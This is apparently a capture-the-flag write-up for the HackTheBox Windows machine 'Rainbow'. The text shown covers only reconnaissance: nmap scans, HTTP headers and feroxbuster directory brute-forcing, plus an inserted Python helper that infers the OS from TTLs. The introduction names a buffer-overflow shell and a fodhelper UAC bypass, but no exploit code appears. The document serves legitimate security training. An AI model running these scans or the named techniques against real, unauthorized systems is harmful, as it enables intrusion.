Rainbow

Rainbow has a custom Windows executable webserver. I’ll find a crash with some manual fuzzing and use x32dbg to weaponize it to get a shell. The user is in the administrator’s group, but UAC prevents reading the root flag. I’ll abuse the fodhelper UAC bypass to get full integrity and full access.

Box Info

Name: Rainbow
Play on HackTheBox
Release Date: 07 Aug 2025
Retire Date: 07 Aug 2025
OS: Windows
Base Points: Medium [30]
First Blood User: N/A (non-competitive)
First Blood Root: N/A (non-competitive)
Creator: xct

Recon

Initial Scanning

nmap finds eight open TCP ports: FTP (21), HTTP (80 and 8080), RPC (135 and 49668), NetBIOS (139), SMB (445), and RDP (3389):

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-30 14:25 UTC
...[snip]...
Nmap scan report for 10.129.234.59
Host is up, received echo-reply ttl 127 (0.095s latency).
Scanned at 2025-07-30 14:25:05 UTC for 13s
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON
21/tcp    open  ftp           syn-ack ttl 127
80/tcp    open  http          syn-ack ttl 127
135/tcp   open  msrpc         syn-ack ttl 127
139/tcp   open  netbios-ssn   syn-ack ttl 127
445/tcp   open  microsoft-ds  syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127
8080/tcp  open  http-proxy    syn-ack ttl 127
49668/tcp open  unknown       syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.54 seconds
           Raw packets sent: 131075 (5.767MB) | Rcvd: 18 (776B)
oxdf@hacky$ nmap -p 21,80,135,139,445,3389,8080,49668 -sCV 10.129.234.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-30 14:25 UTC
Nmap scan report for 10.129.234.59
Host is up (0.089s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 01-18-22  08:22AM                  258 dev.txt
| 01-18-22  08:30AM                54784 rainbow.exe
| 01-16-22  01:34PM                  479 restart.ps1
|_01-16-22  12:14PM       <DIR>          wwwroot
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RAINBOW
|   NetBIOS_Domain_Name: RAINBOW
|   NetBIOS_Computer_Name: RAINBOW
|   DNS_Domain_Name: rainbow
|   DNS_Computer_Name: rainbow
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-30T14:45:23+00:00
|_ssl-date: 2025-07-30T14:46:03+00:00; +16m22s from scanner time.
| ssl-cert: Subject: commonName=rainbow
| Not valid before: 2025-04-14T00:01:02
|_Not valid after:  2025-10-14T00:01:02
8080/tcp  open  http-proxy
|_http-title: Dev Wiki powered by Rainbow Webserver
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Cache-Control: no-cache, private
|     Content-Type: text/html
|     X-Powered-By: Rainbow 0.1
|     Content-Length: 1478
|     <!DOCTYPE html>
|     <html lang="en" xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <meta charset="utf-8" />
|     <title>Dev Wiki powered by Rainbow Webserver</title>
|     <style>
|     .rainbow {
|     font-size: 24pt;
|     background-image: linear-gradient(to left, violet, indigo, blue, green, yellow, orange, red); -webkit-background-clip: text;
|     color: transparent;
|     body {
|     display: flex;
|     justify-content: center;
|     align-items: center;
|     text-align: center;
|     min-height: 100vh;
|     </style>
|     </head>
|     <body>
|     <!--
|     Under Development, please come back later -->
|     <pre class="rainbow">
|     _.--'_......----........
|     _,i,,-'' __,,...........___
|_    ,;-' _.--'' ___,,...
49668/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=7/30%Time=688A2B82%P=x86_64-pc-linux-gnu%r
...[snip]...
SF:20\x20\x20___,,\.\.\.");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-07-30T14:45:25
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: 16m21s, deviation: 0s, median: 16m21s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.02 seconds

The box shows many of the ports associated with a Windows client. The domain is RAINBOW, and the hostname is also RAINBOW. Because the two names match, it’s probably not domain joined.

All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.

The FTP server seems open to anonymous authentication, so I’ll definitely want to check that out.
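The two inferences drawn from the scan above (TTL 127 implying a Windows host one hop away, and matching domain and computer names implying a standalone machine) can be checked mechanically. This is an added example, not part of the original write-up: the function names are my own, the first two inputs are excerpts of the nmap output shown above, and the CORP / ws01.corp.example sample is constructed for contrast.

```python
import re

# Excerpts of the nmap output shown above.
PORT_SCAN = """\
PORT      STATE SERVICE       REASON
21/tcp    open  ftp           syn-ack ttl 127
80/tcp    open  http          syn-ack ttl 127
135/tcp   open  msrpc         syn-ack ttl 127
139/tcp   open  netbios-ssn   syn-ack ttl 127
445/tcp   open  microsoft-ds  syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127
8080/tcp  open  http-proxy    syn-ack ttl 127
49668/tcp open  unknown       syn-ack ttl 127
"""

RDP_INFO = """\
| rdp-ntlm-info:
|   Target_Name: RAINBOW
|   NetBIOS_Domain_Name: RAINBOW
|   NetBIOS_Computer_Name: RAINBOW
|   DNS_Domain_Name: rainbow
|   DNS_Computer_Name: rainbow
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-30T14:45:23+00:00
"""

# Constructed sample (not from the box): what a domain-joined host reports.
DOMAIN_JOINED_INFO = """\
| rdp-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WS01
|   DNS_Domain_Name: corp.example
|   DNS_Computer_Name: ws01.corp.example
|_  Product_Version: 10.0.17763
"""

# Common default initial TTLs by OS family.
INITIAL_TTLS = {64: "Linux/Unix-like", 128: "Windows", 255: "network device"}


def parse_ttls(scan_text):
    """Return {port: ttl} from the REASON column of `nmap -vvv` output."""
    pattern = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+\S+ ttl (\d+)", re.M)
    return {int(port): int(ttl) for port, ttl in pattern.findall(scan_text)}


def infer_from_ttl(ttl):
    """Guess (OS family, hop count) from an observed TTL.

    The initial TTL is taken to be the smallest common default that is
    >= the observed value; each router on the path decrements it by one.
    """
    if not 1 <= ttl <= 255:
        raise ValueError(f"TTL out of range: {ttl}")
    initial = min(t for t in INITIAL_TTLS if t >= ttl)
    return INITIAL_TTLS[initial], initial - ttl


def summarize_ttls(ttls):
    """Group ports by (family, hops).

    More than one group hints that some ports are answered by a different
    host (NAT, port forwarding, containers) and deserve a closer look.
    """
    groups = {}
    for port, ttl in sorted(ttls.items()):
        groups.setdefault(infer_from_ttl(ttl), []).append(port)
    return groups


def parse_ntlm_info(script_output):
    """Return the key/value pairs of an nmap rdp-ntlm-info block."""
    pattern = re.compile(r"^\|[_ ]\s+(\w+):\s+(.+)$", re.M)
    return {key: value.strip() for key, value in pattern.findall(script_output)}


def likely_standalone(info):
    """True when the 'domain' fields just repeat the computer name.

    A domain-joined host reports the domain's NetBIOS name and a fully
    qualified DNS computer name instead.
    """
    return (
        info["NetBIOS_Domain_Name"].lower() == info["NetBIOS_Computer_Name"].lower()
        and info["DNS_Domain_Name"].lower() == info["DNS_Computer_Name"].lower()
    )


if __name__ == "__main__":
    for (family, hops), ports in summarize_ttls(parse_ttls(PORT_SCAN)).items():
        print(f"{family}, {hops} hop(s) away: ports {ports}")
    print("standalone:", likely_standalone(parse_ntlm_info(RDP_INFO)))
```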

Website - TCP 80

Site

The site is the default IIS page.

Tech Stack

The HTTP response headers show the server is IIS:

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 16 Jan 2022 12:29:08 GMT
Accept-Ranges: bytes
ETag: "78206fa8d4ad81:0"
Server: Microsoft-IIS/10.0
Date: Wed, 30 Jul 2025 18:00:45 GMT
Content-Length: 703

The 404 page is the IIS default 404 as well.

The main page loads as /iisstart.htm, which is the default for IIS.

Directory Brute Force

I’ll run feroxbuster against the site with a lowercase wordlist as it’s IIS:

oxdf@hacky$ feroxbuster -u http://10.129.234.59 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt 
                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.234.59
 🚀  Threads               │ 50
 📖  Wordlist              │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      334l     2089w   180418c http://10.129.234.59/iisstart.png
200      GET       32l       55w      703c http://10.129.234.59/
400      GET        6l       26w      324c http://10.129.234.59/error%1F_log
[####################] - 48s    26587/26587   0s      found:3       errors:0      
[####################] - 48s    26584/26584   555/s   http://10.129.234.59/

Nothing at all.

Website - TCP 8080

Site

The site has the title “Dev Wiki powered by Rainbow” and presents some ASCII art at the root.

The source has a comment that says the site is under development.

Tech Stack

The HTTP response headers have an unusual X-Powered-By header:

HTTP/1.1 200 OK
Cache-Control: no-cache, private
Content-Type: text/html
X-Powered-By: Rainbow 0.1
Content-Length: 1478

The page loads as index.html, suggesting a static page.

The 404 page is incredibly simple.

This doesn’t match any default 404 page I know.

Directory Brute Force

I’ll run feroxbuster against the site and it seems to find a lot:

oxdf@hacky$ feroxbuster -u http://10.129.234.59:8080

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.234.59:8080
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        3w       35c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       46l      151w     1478c http://10.129.234.59:8080/cgi
200      GET       46l      151w     1478c http://10.129.234.59:8080/Content
200      GET       46l      151w     1478c http://10.129.234.59:8080/default
200      GET       46l      151w     1478c http://10.129.234.59:8080/dc
200      GET       46l      151w     1478c http://10.129.234.59:8080/Old
200      GET       46l      151w     1478c http://10.129.234.59:8080/estilos
200      GET       46l      151w     1478c http://10.129.234.59:8080/vehiclemakeoffer
200      GET       46l      151w     1478c http://10.129.234.59:8080/locator
200      GET       46l      151w     1478c http://10.129.234.59:8080/mailtemplates
200      GET       46l      151w     1478c http://10.129.234.59:8080/Img
200      GET       46l      151w     1478c http://10.129.234.59:8080/uploadedFiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/works
200      GET       46l      151w     1478c http://10.129.234.59:8080/classic
200      GET       46l      151w     1478c http://10.129.234.59:8080/explore
200      GET       46l      151w     1478c http://10.129.234.59:8080/ex
200      GET       46l      151w     1478c http://10.129.234.59:8080/land
200      GET       46l      151w     1478c http://10.129.234.59:8080/dimcp
200      GET       46l      151w     1478c http://10.129.234.59:8080/CRM
200      GET       46l      151w     1478c http://10.129.234.59:8080/buy_now
200      GET       46l      151w     1478c http://10.129.234.59:8080/CMSSiteManager
200      GET       46l      151w     1478c http://10.129.234.59:8080/ni
200      GET       46l      151w     1478c http://10.129.234.59:8080/browser
200      GET       46l      151w     1478c http://10.129.234.59:8080/poker
200      GET       46l      151w     1478c http://10.129.234.59:8080/site2
200      GET       46l      151w     1478c http://10.129.234.59:8080/setprefs
200      GET       46l      151w     1478c http://10.129.234.59:8080/clases
200      GET       46l      151w     1478c http://10.129.234.59:8080/clienti
200      GET       46l      151w     1478c http://10.129.234.59:8080/compile
200      GET       46l      151w     1478c http://10.129.234.59:8080/arc
200      GET       46l      151w     1478c http://10.129.234.59:8080/asset
200      GET       46l      151w     1478c http://10.129.234.59:8080/froogle_
200      GET       46l      151w     1478c http://10.129.234.59:8080/ClickTale
200      GET       46l      151w     1478c http://10.129.234.59:8080/cursos
200      GET       46l      151w     1478c http://10.129.234.59:8080/emarket
200      GET       46l      151w     1478c http://10.129.234.59:8080/real
200      GET       46l      151w     1478c http://10.129.234.59:8080/rma
200      GET       46l      151w     1478c http://10.129.234.59:8080/sqladmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/newyork
200      GET       46l      151w     1478c http://10.129.234.59:8080/shared_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/baner
200      GET       46l      151w     1478c http://10.129.234.59:8080/committee
200      GET       46l      151w     1478c http://10.129.234.59:8080/hc
200      GET       46l      151w     1478c http://10.129.234.59:8080/slike
200      GET       46l      151w     1478c http://10.129.234.59:8080/store2
200      GET       46l      151w     1478c http://10.129.234.59:8080/AdvHTML_Popups
200      GET       46l      151w     1478c http://10.129.234.59:8080/CMSAdminControls
200      GET       46l      151w     1478c http://10.129.234.59:8080/Desktop
200      GET       46l      151w     1478c http://10.129.234.59:8080/Legal
200      GET       46l      151w     1478c http://10.129.234.59:8080/JavaScripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/MT
200      GET       46l      151w     1478c http://10.129.234.59:8080/_bin
200      GET       46l      151w     1478c http://10.129.234.59:8080/contactar
200      GET       46l      151w     1478c http://10.129.234.59:8080/crss
200      GET       46l      151w     1478c http://10.129.234.59:8080/customcf
200      GET       46l      151w     1478c http://10.129.234.59:8080/mms
200      GET       46l      151w     1478c http://10.129.234.59:8080/oauth
200      GET       46l      151w     1478c http://10.129.234.59:8080/twitteroauth
200      GET       46l      151w     1478c http://10.129.234.59:8080/user_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/zen
200      GET       46l      151w     1478c http://10.129.234.59:8080/authordata
200      GET       46l      151w     1478c http://10.129.234.59:8080/e107_languages
200      GET       46l      151w     1478c http://10.129.234.59:8080/extend
200      GET       46l      151w     1478c http://10.129.234.59:8080/tv_box
200      GET       46l      151w     1478c http://10.129.234.59:8080/upgrades
200      GET       46l      151w     1478c http://10.129.234.59:8080/Import
200      GET       46l      151w     1478c http://10.129.234.59:8080/LICENSE
200      GET       46l      151w     1478c http://10.129.234.59:8080/Map
200      GET       46l      151w     1478c http://10.129.234.59:8080/NewsLetter
200      GET       46l      151w     1478c http://10.129.234.59:8080/bike
200      GET       46l      151w     1478c http://10.129.234.59:8080/bild
200      GET       46l      151w     1478c http://10.129.234.59:8080/broadband
200      GET       46l      151w     1478c http://10.129.234.59:8080/candidates
200      GET       46l      151w     1478c http://10.129.234.59:8080/change
200      GET       46l      151w     1478c http://10.129.234.59:8080/ck
200      GET       46l      151w     1478c http://10.129.234.59:8080/energy
200      GET       46l      151w     1478c http://10.129.234.59:8080/explorer
200      GET       46l      151w     1478c http://10.129.234.59:8080/executables
200      GET       46l      151w     1478c http://10.129.234.59:8080/oldstuff
200      GET       46l      151w     1478c http://10.129.234.59:8080/ofis
200      GET       46l      151w     1478c http://10.129.234.59:8080/opinions
200      GET       46l      151w     1478c http://10.129.234.59:8080/pagerank
200      GET       46l      151w     1478c http://10.129.234.59:8080/photo_gallery
200      GET       46l      151w     1478c http://10.129.234.59:8080/playlists
200      GET       46l      151w     1478c http://10.129.234.59:8080/portugal
200      GET       46l      151w     1478c http://10.129.234.59:8080/test_site
200      GET       46l      151w     1478c http://10.129.234.59:8080/testimonial
200      GET       46l      151w     1478c http://10.129.234.59:8080/tl_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/uni
200      GET       46l      151w     1478c http://10.129.234.59:8080/RepoMonkey
200      GET       46l      151w     1478c http://10.129.234.59:8080/cachep
200      GET       46l      151w     1478c http://10.129.234.59:8080/cafe
200      GET       46l      151w     1478c http://10.129.234.59:8080/citrix
200      GET       46l      151w     1478c http://10.129.234.59:8080/civicrm
200      GET       46l      151w     1478c http://10.129.234.59:8080/skin_acp
200      GET       46l      151w     1478c http://10.129.234.59:8080/gear
200      GET       46l      151w     1478c http://10.129.234.59:8080/nucleus
200      GET       46l      151w     1478c http://10.129.234.59:8080/paul
200      GET       46l      151w     1478c http://10.129.234.59:8080/photoshop
200      GET       46l      151w     1478c http://10.129.234.59:8080/paris
200      GET       46l      151w     1478c http://10.129.234.59:8080/phprusearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/spectra
200      GET       46l      151w     1478c http://10.129.234.59:8080/special-offers
200      GET       46l      151w     1478c http://10.129.234.59:8080/sponsored
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistika
200      GET       46l      151w     1478c http://10.129.234.59:8080/testdir
200      GET       46l      151w     1478c http://10.129.234.59:8080/CA
200      GET       46l      151w     1478c http://10.129.234.59:8080/Approve
200      GET       46l      151w     1478c http://10.129.234.59:8080/Shoppingcart
200      GET       46l      151w     1478c http://10.129.234.59:8080/Tracking
200      GET       46l      151w     1478c http://10.129.234.59:8080/cctvprinting
200      GET       46l      151w     1478c http://10.129.234.59:8080/certification
200      GET       46l      151w     1478c http://10.129.234.59:8080/com_newsfeeds
200      GET       46l      151w     1478c http://10.129.234.59:8080/com_poll
200      GET       46l      151w     1478c http://10.129.234.59:8080/flickrbe
200      GET       46l      151w     1478c http://10.129.234.59:8080/flickrde
200      GET       46l      151w     1478c http://10.129.234.59:8080/flickrfr
200      GET       46l      151w     1478c http://10.129.234.59:8080/huggiesau
200      GET       46l      151w     1478c http://10.129.234.59:8080/kmartau
200      GET       46l      151w     1478c http://10.129.234.59:8080/neufgiga
200      GET       46l      151w     1478c http://10.129.234.59:8080/ohbaby
200      GET       46l      151w     1478c http://10.129.234.59:8080/og
200      GET       46l      151w     1478c http://10.129.234.59:8080/pampers
200      GET       46l      151w     1478c http://10.129.234.59:8080/pageear
200      GET       46l      151w     1478c http://10.129.234.59:8080/pampers1
200      GET       46l      151w     1478c http://10.129.234.59:8080/sblogin
200      GET       46l      151w     1478c http://10.129.234.59:8080/scart
200      GET       46l      151w     1478c http://10.129.234.59:8080/thread
200      GET       46l      151w     1478c http://10.129.234.59:8080/Travel
200      GET       46l      151w     1478c http://10.129.234.59:8080/adv_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/credit-cards
200      GET       46l      151w     1478c http://10.129.234.59:8080/dallas
200      GET       46l      151w     1478c http://10.129.234.59:8080/image_library
200      GET       46l      151w     1478c http://10.129.234.59:8080/imglib
200      GET       46l      151w     1478c http://10.129.234.59:8080/micro
200      GET       46l      151w     1478c http://10.129.234.59:8080/nr
200      GET       46l      151w     1478c http://10.129.234.59:8080/oferta
200      GET       46l      151w     1478c http://10.129.234.59:8080/optin_info
200      GET       46l      151w     1478c http://10.129.234.59:8080/offerte
200      GET       46l      151w     1478c http://10.129.234.59:8080/omniture
200      GET       46l      151w     1478c http://10.129.234.59:8080/od
200      GET       46l      151w     1478c http://10.129.234.59:8080/_Scripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/_batch
200      GET       46l      151w     1478c http://10.129.234.59:8080/commoncontrols
200      GET       46l      151w     1478c http://10.129.234.59:8080/xmlsrv
200      GET       46l      151w     1478c http://10.129.234.59:8080/showprofile
200      GET       46l      151w     1478c http://10.129.234.59:8080/__we_thumbs__
200      GET       46l      151w     1478c http://10.129.234.59:8080/deneme
200      GET       46l      151w     1478c http://10.129.234.59:8080/descarga
200      GET       46l      151w     1478c http://10.129.234.59:8080/formtest
200      GET       46l      151w     1478c http://10.129.234.59:8080/none
200      GET       46l      151w     1478c http://10.129.234.59:8080/perm
200      GET       46l      151w     1478c http://10.129.234.59:8080/ri
200      GET       46l      151w     1478c http://10.129.234.59:8080/riservata
200      GET       46l      151w     1478c http://10.129.234.59:8080/sendToAFriend
200      GET       46l      151w     1478c http://10.129.234.59:8080/selector
200      GET       46l      151w     1478c http://10.129.234.59:8080/sharepoint
200      GET       46l      151w     1478c http://10.129.234.59:8080/um
200      GET       46l      151w     1478c http://10.129.234.59:8080/units
200      GET       46l      151w     1478c http://10.129.234.59:8080/uploadimages
200      GET       46l      151w     1478c http://10.129.234.59:8080/38
200      GET       46l      151w     1478c http://10.129.234.59:8080/35
200      GET       46l      151w     1478c http://10.129.234.59:8080/59
200      GET       46l      151w     1478c http://10.129.234.59:8080/61
200      GET       46l      151w     1478c http://10.129.234.59:8080/76
200      GET       46l      151w     1478c http://10.129.234.59:8080/pageSize
200      GET       46l      151w     1478c http://10.129.234.59:8080/52
200      GET       46l      151w     1478c http://10.129.234.59:8080/LiveFiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/LNSpiderguy
200      GET       46l      151w     1478c http://10.129.234.59:8080/Manual
200      GET       46l      151w     1478c http://10.129.234.59:8080/PL
200      GET       46l      151w     1478c http://10.129.234.59:8080/PM
200      GET       46l      151w     1478c http://10.129.234.59:8080/Vote
200      GET       46l      151w     1478c http://10.129.234.59:8080/adsnew
200      GET       46l      151w     1478c http://10.129.234.59:8080/adwordsresellers
200      GET       46l      151w     1478c http://10.129.234.59:8080/bbtstats
200      GET       46l      151w     1478c http://10.129.234.59:8080/before
200      GET       46l      151w     1478c http://10.129.234.59:8080/benriya
200      GET       46l      151w     1478c http://10.129.234.59:8080/customTags
200      GET       46l      151w     1478c http://10.129.234.59:8080/dd-formmailer
200      GET       46l      151w     1478c http://10.129.234.59:8080/denshikiki
200      GET       46l      151w     1478c http://10.129.234.59:8080/diet
200      GET       46l      151w     1478c http://10.129.234.59:8080/dig
200      GET       46l      151w     1478c http://10.129.234.59:8080/forumpolicy
200      GET       46l      151w     1478c http://10.129.234.59:8080/glavnaya
200      GET       46l      151w     1478c http://10.129.234.59:8080/item-dispatch
200      GET       46l      151w     1478c http://10.129.234.59:8080/imprimer
200      GET       46l      151w     1478c http://10.129.234.59:8080/inform
200      GET       46l      151w     1478c http://10.129.234.59:8080/interfaces
200      GET       46l      151w     1478c http://10.129.234.59:8080/interstitial
200      GET       46l      151w     1478c http://10.129.234.59:8080/itunes
200      GET       46l      151w     1478c http://10.129.234.59:8080/mastercard
200      GET       46l      151w     1478c http://10.129.234.59:8080/manchester
200      GET       46l      151w     1478c http://10.129.234.59:8080/member-login
200      GET       46l      151w     1478c http://10.129.234.59:8080/memberarea
200      GET       46l      151w     1478c http://10.129.234.59:8080/minnesota
200      GET       46l      151w     1478c http://10.129.234.59:8080/organization
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpopenchat
200      GET       46l      151w     1478c http://10.129.234.59:8080/rob
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistiques
200      GET       46l      151w     1478c http://10.129.234.59:8080/timetable
200      GET       46l      151w     1478c http://10.129.234.59:8080/tiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/tobishoku
200      GET       46l      151w     1478c http://10.129.234.59:8080/transactions
200      GET       46l      151w     1478c http://10.129.234.59:8080/tp-files
200      GET       46l      151w     1478c http://10.129.234.59:8080/xx
200      GET       46l      151w     1478c http://10.129.234.59:8080/y2k
200      GET       46l      151w     1478c http://10.129.234.59:8080/51
200      GET       46l      151w     1478c http://10.129.234.59:8080/73
200      GET       46l      151w     1478c http://10.129.234.59:8080/98
200      GET       46l      151w     1478c http://10.129.234.59:8080/112
200      GET       46l      151w     1478c http://10.129.234.59:8080/1970
200      GET       46l      151w     1478c http://10.129.234.59:8080/Community-Care
200      GET       46l      151w     1478c http://10.129.234.59:8080/Click
200      GET       46l      151w     1478c http://10.129.234.59:8080/Conference
200      GET       46l      151w     1478c http://10.129.234.59:8080/Dealer
200      GET       46l      151w     1478c http://10.129.234.59:8080/DreamSite
200      GET       46l      151w     1478c http://10.129.234.59:8080/FAQs
200      GET       46l      151w     1478c http://10.129.234.59:8080/FWi
200      GET       46l      151w     1478c http://10.129.234.59:8080/GetRight
200      GET       46l      151w     1478c http://10.129.234.59:8080/Industries
200      GET       46l      151w     1478c http://10.129.234.59:8080/Installer
200      GET       46l      151w     1478c http://10.129.234.59:8080/anna
200      GET       46l      151w     1478c http://10.129.234.59:8080/categorias
200      GET       46l      151w     1478c http://10.129.234.59:8080/catsicons
200      GET       46l      151w     1478c http://10.129.234.59:8080/clientscripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/cms2
200      GET       46l      151w     1478c http://10.129.234.59:8080/foreign
200      GET       46l      151w     1478c http://10.129.234.59:8080/index_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/infernoshout
200      GET       46l      151w     1478c http://10.129.234.59:8080/jpcache
200      GET       46l      151w     1478c http://10.129.234.59:8080/jsscripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/ktml2
200      GET       46l      151w     1478c http://10.129.234.59:8080/mail2
200      GET       46l      151w     1478c http://10.129.234.59:8080/modals
200      GET       46l      151w     1478c http://10.129.234.59:8080/moda
200      GET       46l      151w     1478c http://10.129.234.59:8080/msk
200      GET       46l      151w     1478c http://10.129.234.59:8080/overlays
200      GET       46l      151w     1478c http://10.129.234.59:8080/outlink
200      GET       46l      151w     1478c http://10.129.234.59:8080/outreach
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpfiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/sky
200      GET       46l      151w     1478c http://10.129.234.59:8080/statuses
200      GET       46l      151w     1478c http://10.129.234.59:8080/termine
200      GET       46l      151w     1478c http://10.129.234.59:8080/them
200      GET       46l      151w     1478c http://10.129.234.59:8080/ti
200      GET       46l      151w     1478c http://10.129.234.59:8080/want
200      GET       46l      151w     1478c http://10.129.234.59:8080/83
200      GET       46l      151w     1478c http://10.129.234.59:8080/ADT
200      GET       46l      151w     1478c http://10.129.234.59:8080/Access
200      GET       46l      151w     1478c http://10.129.234.59:8080/Buy
200      GET       46l      151w     1478c http://10.129.234.59:8080/Cfide
200      GET       46l      151w     1478c http://10.129.234.59:8080/FI
200      GET       46l      151w     1478c http://10.129.234.59:8080/FSL5Apps
200      GET       46l      151w     1478c http://10.129.234.59:8080/Freizeit
200      GET       46l      151w     1478c http://10.129.234.59:8080/NewImages
200      GET       46l      151w     1478c http://10.129.234.59:8080/NotFound
200      GET       46l      151w     1478c http://10.129.234.59:8080/TESTS
200      GET       46l      151w     1478c http://10.129.234.59:8080/Unsubscribe
200      GET       46l      151w     1478c http://10.129.234.59:8080/World
200      GET       46l      151w     1478c http://10.129.234.59:8080/ad1
200      GET       46l      151w     1478c http://10.129.234.59:8080/botones
200      GET       46l      151w     1478c http://10.129.234.59:8080/change_area
200      GET       46l      151w     1478c http://10.129.234.59:8080/delete_account
200      GET       46l      151w     1478c http://10.129.234.59:8080/commentary
200      GET       46l      151w     1478c http://10.129.234.59:8080/controlcenter
200      GET       46l      151w     1478c http://10.129.234.59:8080/costco
200      GET       46l      151w     1478c http://10.129.234.59:8080/cottage
200      GET       46l      151w     1478c http://10.129.234.59:8080/datastore
200      GET       46l      151w     1478c http://10.129.234.59:8080/economy
200      GET       46l      151w     1478c http://10.129.234.59:8080/gfix
200      GET       46l      151w     1478c http://10.129.234.59:8080/helpfiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/jb
200      GET       46l      151w     1478c http://10.129.234.59:8080/lin
200      GET       46l      151w     1478c http://10.129.234.59:8080/linkshare
200      GET       46l      151w     1478c http://10.129.234.59:8080/lochp
200      GET       46l      151w     1478c http://10.129.234.59:8080/mboard
200      GET       46l      151w     1478c http://10.129.234.59:8080/mochi
200      GET       46l      151w     1478c http://10.129.234.59:8080/offering
200      GET       46l      151w     1478c http://10.129.234.59:8080/p3
200      GET       46l      151w     1478c http://10.129.234.59:8080/p7apm
200      GET       46l      151w     1478c http://10.129.234.59:8080/pop-ups
200      GET       46l      151w     1478c http://10.129.234.59:8080/recording
200      GET       46l      151w     1478c http://10.129.234.59:8080/salud
200      GET       46l      151w     1478c http://10.129.234.59:8080/same
200      GET       46l      151w     1478c http://10.129.234.59:8080/sima
200      GET       46l      151w     1478c http://10.129.234.59:8080/should
200      GET       46l      151w     1478c http://10.129.234.59:8080/sim
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistiken
200      GET       46l      151w     1478c http://10.129.234.59:8080/techno
200      GET       46l      151w     1478c http://10.129.234.59:8080/vermont
200      GET       46l      151w     1478c http://10.129.234.59:8080/webreports
200      GET       46l      151w     1478c http://10.129.234.59:8080/69
